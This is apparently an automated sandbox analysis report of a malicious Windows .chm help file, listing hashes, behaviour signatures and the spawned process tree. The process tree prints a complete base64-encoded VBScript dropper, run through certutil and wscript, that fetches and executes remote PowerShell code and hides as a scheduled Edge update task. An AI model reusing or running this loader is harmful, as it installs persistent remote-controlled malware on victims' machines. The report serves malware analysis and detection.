68f2127ca5e808474139b66d145a3cc539c81b98d199e66e40e2d8ebc539fb6f

Analysis

max time kernel
74s
max time network
79s
platform
windows7_x64
resource
win7-20230705-en
resource tags

arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system
submitted
10-07-2023 06:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

68f2127ca5e808474139b66d145a3cc539c81b98d199e66e40e2d8ebc539fb6f.chm
Size

11KB
MD5

cbf4a64e3ac80ffc592c0a5a109d6cb2
SHA1

63d3ce3fe2e5a54a37bbb5059ec9884212ca6240
SHA256

68f2127ca5e808474139b66d145a3cc539c81b98d199e66e40e2d8ebc539fb6f
SHA512

cce778149ac0d86e681f1f3e2912d668aebc74a02df82a5eb1f968c23a69a9aebc1cea243ae50d89898604a17542688b34822a9fa0d9a0885869cad8a53ac383
SSDEEP

96:Mg14WHmLKd7Kw7GK6Q46bvuY3VKdmq83hWw3IOqdEy:MgPGLSKc6lsxVKdp83hWw3c

Score

1^/10

Malware Config

Signatures

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3052	hh.exe
3052	hh.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2888	3052	hh.exe	28
PID 3052 wrote to memory of 2888	3052	hh.exe	28
PID 3052 wrote to memory of 2888	3052	hh.exe	28
PID 3052 wrote to memory of 2060	3052	hh.exe	29
PID 3052 wrote to memory of 2060	3052	hh.exe	29
PID 3052 wrote to memory of 2060	3052	hh.exe	29
PID 2888 wrote to memory of 1680	2888	cmd.exe	31
PID 2888 wrote to memory of 1680	2888	cmd.exe	31
PID 2888 wrote to memory of 1680	2888	cmd.exe	31

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\68f2127ca5e808474139b66d145a3cc539c81b98d199e66e40e2d8ebc539fb6f.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo U3ViIENyZWF0ZUFuZFdyaXRlVG9GaWxlKGZpbGVQYXRoLCBmaWxlQ29udGVudCkKICAgIFNldCBmc28gPSBDcmVhdGVPYmplY3QoIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IikKICAgIFNldCBmaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKGZpbGVQYXRoLCBUcnVlKQogICAgJ21tdW53YmM0emhvdTM3Z2d3c25lbjBqMHEyZ2YyN2h4MmtiOW5oMnhvNmNpenZmcTBvaW16bnVkcjQyM3B3cGUKICAgIGZpbGUuV3JpdGUoZmlsZUNvbnRlbnQpCiAgICBmaWxlLkNsb3NlCkVuZCBTdWIKClN1YiBQcm9jRW50cnkoKQogICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGZvbGRlclB0aCA9ICJDOlxQcm9ncmFtRGF0YVxXaW5kb3dzQXBwc1BCRFwiCiAgICBTZXQgZnNvID0gQ3JlYXRlT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpCiAgICBmc28uQ3JlYXRlRm9sZGVyKGZvbGRlclB0aCkKICAgIGZzby5Db3B5RmlsZSAiQzpcV2luZG93c1xTeXNXT1c2NFxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuZXhlIiwgZm9sZGVyUHRoCiAgICBmc28uQ29weUZpbGUgIkM6XFdpbmRvd3NcU3lzV09XNjRcd3NjcmlwdC5leGUiLCBmb2xkZXJQdGgKICAgIHBzUHRoID0gZm9sZGVyUHRoICYgInBvd2Vyc2hlbGwuZXhlIgogICAgd3NQdGggPSBmb2xkZXJQdGggJiAid3NjcmlwdC5leGUiCiAgICBycHNQdGggPSBmb2xkZXJQdGggJiAici52YnMiCiAgICBwc3NQdGggID0gZm9sZGVyUHRoICYgInIucHMxIgogICAgc2NoUHRoID0gZm9sZGVyUHRoICYgInNjaC52YnMiCiAgICBycHNDb250ID0gIk9uIEVycm9yIFJlc3VtZSBOZXh0OlNldCBvYmpTaGVsbCA9IENyZWF0ZU9iamVjdCgiIldTY3JpcHQuU2hlbGwiIik6c3RyQ29tbWFuZCA9ICIiIiAmIHBzUHRoICYgIiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiICYgcHNzUHRoICYgIiIiOm9ialNoZWxsLlJ1biBzdHJDb21tYW5kLCAwLCBUcnVlIgogICAgcGFzc0NvbnQgPSAiSW52b2tlLVInZSdzJ3QnTSdlJ3Rob2QgLVVyaSAnaHR0cDovL2VkZ2UubWljcm9zb2Z0LnNreW1hbi5jbG91ZC9pbWFnZXMvMS5qcGcnIHwgSW52b2tlLUV4cHJlc3Npb24iCiAgICBzY2hDb250ID0gIk9uIEVycm9yIFJlc3VtZSBOZXh0OlNldCBvYmpTaGVsbCA9IENyZWF0ZU9iamVjdCgiIldTY3JpcHQuU2hlbGwiIik6c3RyQ29tbWFuZCA9ICIiY21kIC9jIHNjaHRhc2tzIC9jcmVhdGUgL3NjIGhvdXJseSAvbW8gMiAvdG4gIiIiIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVVBTyIiIiIgL3RyICIiIiIiICYgd3NQdGggJiAiIC8vYiAiICYgcnBzUHRoICYgIiIiIiIgJiBzY2h0YXNrcyAvcnVuIC90biAiIiIiTWljcm9zb2Z0RWRnZVVwZGF0ZVRhc2tNYWNoaW5lVUFPIiIiIiIiOm9ialNoZWxsLlJ1biBzdHJDb21tYW5kLCAwLCBGYWxzZSIKICAgIENyZWF0ZUFuZFdyaXRlVG9GaWxlIHJwc1B0aCwgcnBzQ29udAogICAgQ3JlYXRlQW5kV3JpdGVUb0ZpbGUgcHNzUHRoLCBwYXNzQ29udAogICAgQ3JlYXRlQW5kV3JpdGVUb0ZpbGUgc2NoUHRoLCBzY2hDb250CiAgICBTZXQgd20gPSBHZXRPYmplY3QoIndpbm1nbXRzOndpbjMyX3Byb2Nlc3MiKQogICAgd20uQ3JlYXRlICJ3c2NyaXB0LmV4ZSAvL2U6dmJzY3JpcHQgLy9iICIgJiBzY2hQdGgKRW5kIFN1YiAKUHJvY0VudHJ5 > "C:\\ProgramData\\r.dat" & start /MIN certutil -decode "C:\\ProgramData\\r.dat" "C:\\ProgramData\\r.vbs" & del "C:\\ProgramData\\r.dat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\\ProgramData\\r.dat" "C:\\ProgramData\\r.vbs"
    3⤵
    PID:1680
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" //e:vbscript //b "C:\\ProgramData\\r.vbs"
  2⤵
  PID:2060

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\r.dat

Filesize
2KB

MD5
d3a57466bd16065264cad205fe0cf119

SHA1
c3eca2d27e84590daed61030a6d66047d1f4b330

SHA256
d5c3f5003a9166859a1ad8fa28a4b14fdeebf706c198f732c45f54531adc5082

SHA512
b05f1ca9f21454e43ad10067d35e846d85081dce40db28ba3e8fb88f1a08516774a896c15a5901364d13fc4a231472ce529c613bcf514bfcc5f328fea1c5eecf

Download Submit